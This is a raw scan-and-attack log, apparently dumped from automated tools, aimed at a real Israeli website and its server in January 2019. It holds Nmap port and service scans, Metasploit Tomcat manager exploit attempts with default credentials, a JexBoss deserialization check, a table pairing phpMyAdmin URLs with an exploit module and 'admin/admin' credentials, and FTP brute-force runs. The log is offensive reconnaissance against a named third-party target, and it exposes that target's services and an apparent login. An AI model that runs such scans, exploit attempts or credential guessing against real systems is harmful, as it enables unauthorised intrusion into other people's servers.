25511 146.37 ms 10.246.200.1
25522 146.77 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
25533 146.42 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
25544 146.42 ms sfia-b2-link.telia.net (62.115.148.144)
25555 179.82 ms prag-bb1-link.telia.net (62.115.119.70)
25566 179.21 ms ffm-bb4-link.telia.net (62.115.133.79)
25577 179.86 ms ffm-b1-link.telia.net (62.115.121.1)
25588 179.26 ms 80.239.196.190
25599 ...
256010 233.90 ms gw2-hfa-0-2-0-2-200-gw2.fra.nv.net.il (212.143.12.13)
256111 233.26 ms 212.143.12.32
256212 234.29 ms 212.143.7.28
256313 233.81 ms po221.srvc3.rha.nv.net.il (212.143.201.188)
256414 234.25 ms 82.166.37.254
256515 232.54 ms 82.166.37.254
256616 233.45 ms 62-90-134-178.barak.net.il (62.90.134.178)
256717 234.31 ms server.webid.co.il (62.90.134.182)
2568#######################################################################################################################################
2569RHOSTS => babylon-woodline.co.il
2570RHOST => babylon-woodline.co.il
2571[-] WAR file not found
2572[*] Auxiliary module execution completed
2573[*] Scanned 1 of 1 hosts (100% complete)
2574[*] Auxiliary module execution completed
2575RPORT => 8080
2576[*] Scanned 1 of 1 hosts (100% complete)
2577[*] Auxiliary module execution completed
2578[*] Attempting to connect to 62.90.134.182:8080
2579[+] No File(s) found
2580[*] Scanned 1 of 1 hosts (100% complete)
2581[*] Auxiliary module execution completed
2582[*] http://62.90.134.182:8080/admin/j_security_check - Checking j_security_check...
2583[*] http://62.90.134.182:8080/admin/j_security_check - Server returned: 404
2584[-] http://62.90.134.182:8080/admin/j_security_check - Unable to enumerate users with this URI
2585[*] Scanned 1 of 1 hosts (100% complete)
2586[*] Auxiliary module execution completed
2587[-] http://62.90.134.182:8080 - Authorization not requested
2588[*] Scanned 1 of 1 hosts (100% complete)
2589[*] Auxiliary module execution completed
2590[-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
2591[*] Exploit completed, but no session was created.
2592USERNAME => tomcat
2593PASSWORD => tomcat
2594[-] Exploit aborted due to failure: not-found: The target server fingerprint "Apache/2" does not match "(?-mix:Apache.*(Coyote|Tomcat))", use 'set FingerprintCheck false' to disable this check.
2595[*] Exploit completed, but no session was created.
2596#######################################################################################################################################
2597
2598 * --- JexBoss: Jboss verify and EXploitation Tool --- *
2599 | * And others Java Deserialization Vulnerabilities * |
2600 | |
2601 | @author: João Filho Matos Figueiredo |
2602 | @contact: joaomatosf@gmail.com |
2603 | |
2604 | @update: https://github.com/joaomatosf/jexboss |
2605 #______________________________________________________#
2606
2607 @version: 1.2.4
2608
2609 * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
2610
2611
2612 ** Checking Host: http://babylon-woodline.co.il:8080 **
2613
2614 [*] Checking admin-console: [ OK ]
2615 [*] Checking Struts2: [ OK ]
2616 [*] Checking Servlet Deserialization: [ OK ]
2617 [*] Checking Application Deserialization: [ OK ]
2618 [*] Checking Jenkins: [ OK ]
2619 [*] Checking web-console: [ OK ]
2620 [*] Checking jmx-console: [ REDIRECT ]
2621 * The server sent a redirect to: /HtmlAdaptor/index.1.html
2622
2623 [*] Checking JMXInvokerServlet: [ OK ]
2624
2625
2626 * Results:
2627 The server is not vulnerable to bugs tested ... :D
2628
2629 * Info: review, suggestions, updates, etc:
2630 https://github.com/joaomatosf/jexboss
2631
2632 * DONATE: Please consider making a donation to help improve this tool,
2633 * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
2634######################################################################################################################################
2635+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
2636| App Name | URL to Application | Potential Exploit | Username | Password |
2637+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
2638| phpMyAdmin | https://62.90.134.182:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | admin | admin |
2639| phpMyAdmin | https://62.90.134.182:8081/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
2640+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
2641#######################################################################################################################################
2642Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:09 EST
2643NSE: Loaded 149 scripts for scanning.
2644NSE: Script Pre-scanning.
2645NSE: Starting runlevel 1 (of 3) scan.
2646Initiating NSE at 05:09
2647Completed NSE at 05:09, 0.00s elapsed
2648NSE: Starting runlevel 2 (of 3) scan.
2649Initiating NSE at 05:09
2650Completed NSE at 05:09, 0.00s elapsed
2651NSE: Starting runlevel 3 (of 3) scan.
2652Initiating NSE at 05:09
2653Completed NSE at 05:09, 0.00s elapsed
2654Initiating Ping Scan at 05:09
2655Scanning babylon-woodline.co.il (62.90.134.182) [4 ports]
2656Completed Ping Scan at 05:09, 0.27s elapsed (1 total hosts)
2657Initiating Parallel DNS resolution of 1 host. at 05:09
2658Completed Parallel DNS resolution of 1 host. at 05:09, 0.02s elapsed
2659Initiating Connect Scan at 05:09
2660Scanning babylon-woodline.co.il (62.90.134.182) [1000 ports]
2661Discovered open port 587/tcp on 62.90.134.182
2662Discovered open port 8080/tcp on 62.90.134.182
2663Discovered open port 995/tcp on 62.90.134.182
2664Discovered open port 143/tcp on 62.90.134.182
2665Discovered open port 21/tcp on 62.90.134.182
2666Discovered open port 3306/tcp on 62.90.134.182
2667Discovered open port 110/tcp on 62.90.134.182
2668Discovered open port 80/tcp on 62.90.134.182
2669Discovered open port 53/tcp on 62.90.134.182
2670Discovered open port 993/tcp on 62.90.134.182
2671Discovered open port 443/tcp on 62.90.134.182
2672Discovered open port 5060/tcp on 62.90.134.182
2673Discovered open port 2222/tcp on 62.90.134.182
2674Discovered open port 8081/tcp on 62.90.134.182
2675Discovered open port 2000/tcp on 62.90.134.182
2676Discovered open port 465/tcp on 62.90.134.182
2677Completed Connect Scan at 05:09, 9.19s elapsed (1000 total ports)
2678Initiating Service scan at 05:09
2679Scanning 16 services on babylon-woodline.co.il (62.90.134.182)
2680Completed Service scan at 05:09, 19.21s elapsed (16 services on 1 host)
2681Initiating OS detection (try #1) against babylon-woodline.co.il (62.90.134.182)
2682Retrying OS detection (try #2) against babylon-woodline.co.il (62.90.134.182)
2683Initiating Traceroute at 05:09
2684Completed Traceroute at 05:09, 3.03s elapsed
2685Initiating Parallel DNS resolution of 15 hosts. at 05:09
2686Completed Parallel DNS resolution of 15 hosts. at 05:10, 16.51s elapsed
2687NSE: Script scanning 62.90.134.182.
2688NSE: Starting runlevel 1 (of 3) scan.
2689Initiating NSE at 05:10
2690Completed NSE at 05:10, 22.76s elapsed
2691NSE: Starting runlevel 2 (of 3) scan.
2692Initiating NSE at 05:10
2693NSE Timing: About 90.62% done; ETC: 05:11 (0:00:03 remaining)
2694NSE Timing: About 92.19% done; ETC: 05:11 (0:00:05 remaining)
2695NSE Timing: About 93.75% done; ETC: 05:12 (0:00:06 remaining)
2696NSE Timing: About 94.53% done; ETC: 05:12 (0:00:07 remaining)
2697NSE Timing: About 95.31% done; ETC: 05:13 (0:00:07 remaining)
2698NSE Timing: About 97.66% done; ETC: 05:13 (0:00:04 remaining)
2699Completed NSE at 05:13, 207.01s elapsed
2700NSE: Starting runlevel 3 (of 3) scan.
2701Initiating NSE at 05:13
2702Completed NSE at 05:13, 0.00s elapsed
2703Nmap scan report for babylon-woodline.co.il (62.90.134.182)
2704Host is up, received syn-ack ttl 50 (0.18s latency).
2705rDNS record for 62.90.134.182: server.webid.co.il
2706Scanned at 2019-01-23 05:09:11 EST for 285s
2707Not shown: 797 closed ports, 187 filtered ports
2708Reason: 797 conn-refused and 187 no-responses
2709PORT STATE SERVICE REASON VERSION
271021/tcp open ftp syn-ack ProFTPD
2711|_ssl-date: TLS randomness does not represent time
2712| tls-alpn:
2713|_ ftp
2714| tls-nextprotoneg:
2715|_ ftp
271653/tcp open domain syn-ack ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
2717| dns-nsid:
2718|_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
271980/tcp open http syn-ack nginx
2720|_http-favicon: Unknown favicon MD5: FFF38020C5ABFF9E0F6B3AFCD2E35E75
2721| http-methods:
2722|_ Supported Methods: GET HEAD POST
2723|_http-server-header: nginx
2724| http-title: \xD7\x9E\xD7\x96\xD7\xA8\xD7\x95\xD7\xA0\xD7\x99\xD7\x9D \xD7\x9C\xD7\x99\xD7\x99\xD7\x9F
2725|_Requested resource was /index.1.html
2726110/tcp open pop3 syn-ack Dovecot DirectAdmin pop3d
2727|_pop3-capabilities: PIPELINING TOP SASL(PLAIN) UIDL AUTH-RESP-CODE CAPA USER RESP-CODES STLS
2728|_ssl-date: TLS randomness does not represent time
2729143/tcp open imap syn-ack Dovecot imapd
2730|_imap-capabilities: ID LITERAL+ more have post-login capabilities IMAP4rev1 LOGIN-REFERRALS listed IDLE AUTH=PLAINA0001 STARTTLS Pre-login ENABLE SASL-IR OK
2731|_ssl-date: TLS randomness does not represent time
2732443/tcp open ssl/http syn-ack nginx
2733| http-methods:
2734|_ Supported Methods: GET HEAD POST
2735|_http-server-header: nginx
2736|_http-title: Secured Home of babylon-woodline.co.il
2737| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
2738| Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
2739| Public Key type: rsa
2740| Public Key bits: 2048
2741| Signature Algorithm: sha1WithRSAEncryption
2742| Not valid before: 2014-09-20T10:18:07
2743| Not valid after: 2042-02-04T10:18:07
2744| MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
2745| SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
2746| -----BEGIN CERTIFICATE-----
2747| MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
2748| VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
2749| BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
2750| MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
2751| MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
2752| ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
2753| A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
2754| ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
2755| AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
2756| bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
2757| WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
2758| CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
2759| 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
2760| 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
2761| b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
2762| 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
2763| 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
2764| WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
2765| hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
2766| Mkh66D1gfgB2ubts
2767|_-----END CERTIFICATE-----
2768|_ssl-date: TLS randomness does not represent time
2769| tls-alpn:
2770| h2
2771|_ http/1.1
2772| tls-nextprotoneg:
2773| h2
2774|_ http/1.1
2775465/tcp open ssl/smtp syn-ack Exim smtpd 4.91
2776|_smtp-commands: SMTP EHLO babylon-woodline.co.il: failed to receive data: failed to receive data
2777| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/emailAddress=webaster@localhost/organizationalUnitName=none/localityName=Sometown
2778| Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB/emailAddress=webaster@localhost/organizationalUnitName=none/localityName=Sometown
2779| Public Key type: rsa
2780| Public Key bits: 1024
2781| Signature Algorithm: sha1WithRSAEncryption
2782| Not valid before: 2014-07-29T06:26:14
2783| Not valid after: 2041-12-13T06:26:14
2784| MD5: 4b29 2c8a 525a d420 e4f7 78c1 45d2 4ed9
2785| SHA-1: cc0a 349f 83d9 4d41 d316 0e7a a751 ce8d 5322 7241
2786| -----BEGIN CERTIFICATE-----
2787| MIICkTCCAfoCCQD3JF1s3Ui7BzANBgkqhkiG9w0BAQUFADCBjDELMAkGA1UEBhMC
2788| R0IxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
2789| BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEh
2790| MB8GCSqGSIb3DQEJARYSd2ViYXN0ZXJAbG9jYWxob3N0MB4XDTE0MDcyOTA2MjYx
2791| NFoXDTQxMTIxMzA2MjYxNFowgYwxCzAJBgNVBAYTAkdCMRUwEwYDVQQIEwxTb21l
2792| cHJvdmluY2UxETAPBgNVBAcTCFNvbWV0b3duMQ0wCwYDVQQKEwRub25lMQ0wCwYD
2793| VQQLEwRub25lMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEndl
2794| YmFzdGVyQGxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEA5Euc
2795| SYOuqLn4h5hktsteODz8pR6VsFNktHT+tgSHoEPeJ/2S1efAY/zoMRhwXo9k9RVc
2796| S11EDYVjzGrQeni2/o0rFC3kCJI37P4AHbaQg7BJlyqVW9BHQaHW++gknGH8L2XF
2797| DC97iiawhWQIEF06Hg8319FHZZBdTEi3w5A0R10CAwEAATANBgkqhkiG9w0BAQUF
2798| AAOBgQBT5tKhGxu0mGTfi9dP8q21FSzhyR9G5n7uGL/+3Bl7Six7w9l+4HOy3zMl
2799| VvJTXWh+FGInAytzBf4BzC3D84qo13B8w13tivpdNf1o1WV65fgBZZTmak/KCbZf
2800| 9BHpO92XZPxlmPCEPoMmyXN0dVM8jZmbI6LvFZZS1EBIPx9fng==
2801|_-----END CERTIFICATE-----
2802|_ssl-date: TLS randomness does not represent time
2803587/tcp open smtp syn-ack Exim smtpd 4.91
2804|_smtp-commands: SMTP: EHLO 550 Bad HELO - Host impersonating domain name [babylon-woodline.co.il]\x0D
2805993/tcp open ssl/imaps? syn-ack
2806|_ssl-date: TLS randomness does not represent time
2807995/tcp open ssl/pop3s? syn-ack
2808|_ssl-date: TLS randomness does not represent time
28092000/tcp open tcpwrapped syn-ack
28102222/tcp open http syn-ack DirectAdmin httpd 1.53.0 (Registered to webid.co.il)
2811|_http-favicon: Unknown favicon MD5: F0CC6DDDAE553AA7CFEB2CA5B62B2083
2812| http-methods:
2813|_ Supported Methods: GET HEAD POST
2814|_http-title: Site doesn't have a title (text/html).
2815|_http-trane-info: Problem with XML parsing of /evox/about
28163306/tcp open mysql syn-ack MySQL 5.5.60-MariaDB
2817| mysql-info:
2818| Protocol: 10
2819| Version: 5.5.60-MariaDB
2820| Thread ID: 11696681
2821| Capabilities flags: 63487
2822| Some Capabilities: ODBCClient, Speaks41ProtocolOld, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsTransactions, Support41Auth, SupportsCompression, FoundRows, Speaks41ProtocolNew, InteractiveClient, IgnoreSigpipes, LongPassword, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongColumnFlag, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments
2823| Status: Autocommit
2824| Salt: -y>fhYbaBeV`_=P\^DuB
2825|_ Auth Plugin Name: mysql_native_password
28265060/tcp open tcpwrapped syn-ack
28278080/tcp open ssl/http-proxy syn-ack Apache/2
2828| http-methods:
2829|_ Supported Methods: GET HEAD POST OPTIONS
2830|_http-open-proxy: Proxy might be redirecting requests
2831|_http-server-header: Apache/2
2832| http-title: \xD7\x9E\xD7\x96\xD7\xA8\xD7\x95\xD7\xA0\xD7\x99\xD7\x9D \xD7\x9C\xD7\x99\xD7\x99\xD7\x9F
2833|_Requested resource was /index.1.html
28348081/tcp open ssl/ssl syn-ack Apache httpd (SSL-only mode)
2835| ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
2836| Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US/emailAddress=webmaster@localhost/organizationalUnitName=none/localityName=Sometown
2837| Public Key type: rsa
2838| Public Key bits: 2048
2839| Signature Algorithm: sha1WithRSAEncryption
2840| Not valid before: 2014-09-20T10:18:07
2841| Not valid after: 2042-02-04T10:18:07
2842| MD5: 97da b648 4f2a ad48 4f97 84fd 6789 b7bb
2843| SHA-1: 2e3f 643e 5d11 a459 bd85 ab36 e5e5 593f 04c8 e51f
2844| -----BEGIN CERTIFICATE-----
2845| MIIDmDCCAoACCQCZ91j/rN7tyzANBgkqhkiG9w0BAQUFADCBjTELMAkGA1UEBhMC
2846| VVMxFTATBgNVBAgTDFNvbWVwcm92aW5jZTERMA8GA1UEBxMIU29tZXRvd24xDTAL
2847| BgNVBAoTBG5vbmUxDTALBgNVBAsTBG5vbmUxEjAQBgNVBAMTCWxvY2FsaG9zdDEi
2848| MCAGCSqGSIb3DQEJARYTd2VibWFzdGVyQGxvY2FsaG9zdDAeFw0xNDA5MjAxMDE4
2849| MDdaFw00MjAyMDQxMDE4MDdaMIGNMQswCQYDVQQGEwJVUzEVMBMGA1UECBMMU29t
2850| ZXByb3ZpbmNlMREwDwYDVQQHEwhTb21ldG93bjENMAsGA1UEChMEbm9uZTENMAsG
2851| A1UECxMEbm9uZTESMBAGA1UEAxMJbG9jYWxob3N0MSIwIAYJKoZIhvcNAQkBFhN3
2852| ZWJtYXN0ZXJAbG9jYWxob3N0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC
2853| AQEAr/uRtz74Kc4qIEnSgfQQgY+r3EyOCRPcIoTGbcukLIwe9sP2PdMIYeonuEh4
2854| bshnBLjjtk6CzcOK9s1Vb1CW4Vmtb5eI1TNcsokAUVV5llTZEfIuY2UtroV8W2LI
2855| WZ6VxbwEzd+UeeGrHiMUc9O94sxU/fDo5ttAdElgfIEp+uR5qDG2VzpE5F7Lc61L
2856| CF7xFUrxRMgCYYCYmr7Zs/FNY2nU920i7hRco6bgRQeQvAC+KFKsHuUzyq08g3Q6
2857| 0V6DCBmAaq5Ku4QzQBGSFRXb/6jYYhGYxO4f6VsxLrBA7LL0kwUL+YCjXCz1iK3R
2858| 6kiVRcyJqtWahOHDq3YKaLtr1wIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQA+4fjC
2859| b19T78ZHZNXZodf7Tpl8PMY6ljd6nU9dokYwvnFgR9anGpTfXipcGDSorEdFMBqH
2860| 5cPN/yu6SNRQaLnYwqII9we2HDMFAnYlvCb1vNSSp2k+KIf6nEEvE2B0zfL7+dHJ
2861| 0rJyggNXT0VTs7ZI9PM/RlPH75khNHD7U3Vz4NSBVm7oTVg8VZhExKhS2JTy2zii
2862| WjGPVzBbMzGioZhHE/b96M70o+89fxkE+g3oNJLAZJfao2qy5oiLAt1spCPQ40HW
2863| hPzHGuGIMABG+263nikmVG0m0A3JTYQLfgBqxiBkauP6kT3KszTGXWUduj/9YHRW
2864| Mkh66D1gfgB2ubts
2865|_-----END CERTIFICATE-----
2866|_ssl-date: TLS randomness does not represent time
2867| tls-alpn:
2868|_ http/1.1
2869OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
2870Aggressive OS guesses: Linux 2.6.32 (93%), Linux 2.6.32 or 3.10 (93%), WatchGuard Fireware 11.8 (93%), Synology DiskStation Manager 5.1 (92%), Linux 2.6.39 (92%), Linux 3.4 (92%), Linux 3.1 - 3.2 (92%), Linux 3.10 (91%), Linux 2.6.32 - 2.6.39 (90%), Linux 2.6.32 - 3.0 (89%)
2871No exact OS matches for host (test conditions non-ideal).
2872TCP/IP fingerprint:
2873SCAN(V=7.70SVN%E=4%D=1/23%OT=21%CT=1%CU=%PV=N%DS=17%DC=T%G=N%TM=5C483E64%P=x86_64-unknown-linux-gnu)
2874SEQ(SP=100%GCD=1%ISR=108%TI=Z%II=I%TS=A)
2875SEQ(SP=100%GCD=1%ISR=108%TI=Z%TS=A)
2876OPS(O1=M4B3ST11NW7%O2=M4B3ST11NW7%O3=M4B3NNT11NW7%O4=M4B3ST11NW7%O5=M4B3ST11NW7%O6=M4B3ST11)
2877WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)
2878ECN(R=Y%DF=Y%TG=40%W=3908%O=M4B3NNSNW7%CC=Y%Q=)
2879T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
2880T2(R=N)
2881T3(R=N)
2882T4(R=N)
2883T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
2884T6(R=N)
2885T7(R=N)
2886U1(R=N)
2887IE(R=Y%DFI=N%TG=40%CD=S)
2888
2889Uptime guess: 25.505 days (since Fri Dec 28 17:06:06 2018)
2890Network Distance: 17 hops
2891TCP Sequence Prediction: Difficulty=256 (Good luck!)
2892IP ID Sequence Generation: All zeros
2893Service Info: OSs: Unix, Linux; CPE: cpe:/o:redhat:enterprise_linux:7
2894
2895TRACEROUTE (using proto 1/icmp)
2896HOP RTT ADDRESS
28971 145.48 ms 10.246.200.1
28982 148.22 ms vlan113.as01.sof1.bg.m247.com (193.9.115.113)
28993 147.04 ms vlan299.bb1.sof1.bg.m247.com (176.10.83.34)
29004 145.67 ms sfia-b2-link.telia.net (62.115.148.144)
29015 178.68 ms 62.115.119.76
29026 178.15 ms 62.115.133.79
29037 177.96 ms ffm-b1-link.telia.net (62.115.116.158)
29048 178.71 ms netvision-ic-309800-ffm-b11.c.telia.net (80.239.196.190)
29059 ...
290610 231.84 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
290711 229.29 ms gw2-hfa-po10-gw1.nta.nv.net.il (212.143.12.32)
290812 230.00 ms 212.143.7.247
290913 230.16 ms core2-rha-2-0-0-core2-hfa-5-0-7.nv.net.il (212.143.12.119)
291014 235.77 ms po231.srvc3.rha.nv.net.il (212.143.201.190)
291115 231.62 ms 82.166.37.254
291216 232.69 ms 62-90-134-178.barak.net.il (62.90.134.178)
291317 231.57 ms server.webid.co.il (62.90.134.182)
2914
2915NSE: Script Post-scanning.
2916NSE: Starting runlevel 1 (of 3) scan.
2917Initiating NSE at 05:13
2918Completed NSE at 05:13, 0.00s elapsed
2919NSE: Starting runlevel 2 (of 3) scan.
2920Initiating NSE at 05:13
2921Completed NSE at 05:13, 0.00s elapsed
2922NSE: Starting runlevel 3 (of 3) scan.
2923Initiating NSE at 05:13
2924Completed NSE at 05:13, 0.00s elapsed
2925Read data files from: /usr/local/bin/../share/nmap
2926OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2927Nmap done: 1 IP address (1 host up) scanned in 285.87 seconds
2928 Raw packets sent: 100 (7.834KB) | Rcvd: 1149 (559.312KB)
2929#######################################################################################################################################
2930Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:13 EST
2931NSE: Loaded 149 scripts for scanning.
2932NSE: Script Pre-scanning.
2933Initiating NSE at 05:13
2934Completed NSE at 05:13, 0.00s elapsed
2935Initiating NSE at 05:13
2936Completed NSE at 05:13, 0.00s elapsed
2937Initiating NSE at 05:13
2938Completed NSE at 05:13, 0.00s elapsed
2939Initiating Parallel DNS resolution of 1 host. at 05:13
2940Completed Parallel DNS resolution of 1 host. at 05:13, 0.02s elapsed
2941Initiating UDP Scan at 05:13
2942Scanning babylon-woodline.co.il (62.90.134.182) [13 ports]
2943Discovered open port 53/udp on 62.90.134.182
2944Completed UDP Scan at 05:14, 4.61s elapsed (13 total ports)
2945Initiating Service scan at 05:14
2946Scanning 1 service on babylon-woodline.co.il (62.90.134.182)
2947Completed Service scan at 05:14, 0.23s elapsed (1 service on 1 host)
2948Initiating OS detection (try #1) against babylon-woodline.co.il (62.90.134.182)
2949Retrying OS detection (try #2) against babylon-woodline.co.il (62.90.134.182)
2950Initiating Traceroute at 05:14
2951Completed Traceroute at 05:14, 7.22s elapsed
2952Initiating Parallel DNS resolution of 1 host. at 05:14
2953Completed Parallel DNS resolution of 1 host. at 05:14, 0.02s elapsed
2954NSE: Script scanning 62.90.134.182.
2955Initiating NSE at 05:14
2956Completed NSE at 05:14, 0.47s elapsed
2957Initiating NSE at 05:14
2958Completed NSE at 05:14, 0.00s elapsed
2959Initiating NSE at 05:14
2960Completed NSE at 05:14, 0.00s elapsed
2961Nmap scan report for babylon-woodline.co.il (62.90.134.182)
2962Host is up (0.23s latency).
2963rDNS record for 62.90.134.182: server.webid.co.il
2964
2965PORT STATE SERVICE VERSION
296653/udp open domain ISC BIND 9.9.4 (RedHat Enterprise Linux 7)
2967| dns-nsid:
2968|_ bind.version: 9.9.4-RedHat-9.9.4-61.el7
296967/udp closed dhcps
297068/udp closed dhcpc
297169/udp closed tftp
297288/udp closed kerberos-sec
2973123/udp closed ntp
2974137/udp filtered netbios-ns
2975138/udp filtered netbios-dgm
2976139/udp closed netbios-ssn
2977162/udp closed snmptrap
2978389/udp closed ldap
2979520/udp closed route
29802049/udp closed nfs
2981Too many fingerprints match this host to give specific OS details
2982Network Distance: 17 hops
2983Service Info: OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:7
2984
2985TRACEROUTE (using port 138/udp)
2986HOP RTT ADDRESS
29871 ... 7
29888 142.93 ms 10.246.200.1
29899 ... 10
299011 148.28 ms 10.246.200.1
299112 143.06 ms 10.246.200.1
299213 143.06 ms 10.246.200.1
299314 143.06 ms 10.246.200.1
299415 143.05 ms 10.246.200.1
299516 143.05 ms 10.246.200.1
299617 143.07 ms 10.246.200.1
299718 ...
299819 145.09 ms 10.246.200.1
299920 143.55 ms 10.246.200.1
300021 ... 28
300129 147.56 ms 10.246.200.1
300230 144.82 ms 10.246.200.1
3003
3004NSE: Script Post-scanning.
3005Initiating NSE at 05:14
3006Completed NSE at 05:14, 0.00s elapsed
3007Initiating NSE at 05:14
3008Completed NSE at 05:14, 0.00s elapsed
3009Initiating NSE at 05:14
3010Completed NSE at 05:14, 0.00s elapsed
3011Read data files from: /usr/local/bin/../share/nmap
3012OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3013Nmap done: 1 IP address (1 host up) scanned in 17.32 seconds
3014 Raw packets sent: 123 (5.705KB) | Rcvd: 1819 (484.907KB)
3015#######################################################################################################################################
3016Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 05:14 EST
3017Nmap scan report for babylon-woodline.co.il (62.90.134.182)
3018Host is up (0.23s latency).
3019rDNS record for 62.90.134.182: server.webid.co.il
3020Not shown: 17 closed ports, 1 filtered port
3021Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
3022PORT STATE SERVICE
302321/tcp open ftp
302453/tcp open domain
302580/tcp open http
3026110/tcp open pop3
3027443/tcp open https
3028993/tcp open imaps
30293306/tcp open mysql
30308080/tcp open http-proxy
3031#######################################################################################################################################
3032Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
3033Nmap scan report for server.webid.co.il (62.90.134.182)
3034Host is up (0.23s latency).
3035Not shown: 336 closed ports, 124 filtered ports
3036Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
3037PORT STATE SERVICE
303821/tcp open ftp
303953/tcp open domain
304080/tcp open http
3041110/tcp open pop3
3042143/tcp open imap
3043443/tcp open https
3044465/tcp open smtps
3045587/tcp open submission
3046993/tcp open imaps
3047995/tcp open pop3s
30482000/tcp open cisco-sccp
30492222/tcp open EtherNetIP-1
30503306/tcp open mysql
30515060/tcp open sip
30528080/tcp open http-proxy
30538081/tcp open blackice-icecap
3054#######################################################################################################################################
3055Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
3056Nmap scan report for server.webid.co.il (62.90.134.182)
3057Host is up (0.21s latency).
3058Not shown: 10 closed ports, 2 filtered ports
3059PORT STATE SERVICE
306053/udp open domain
3061######################################################################################################################################
3062Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-01-23 04:21 EST
3063NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
3064NSE: [ftp-brute] usernames: Time limit 3m00s exceeded.
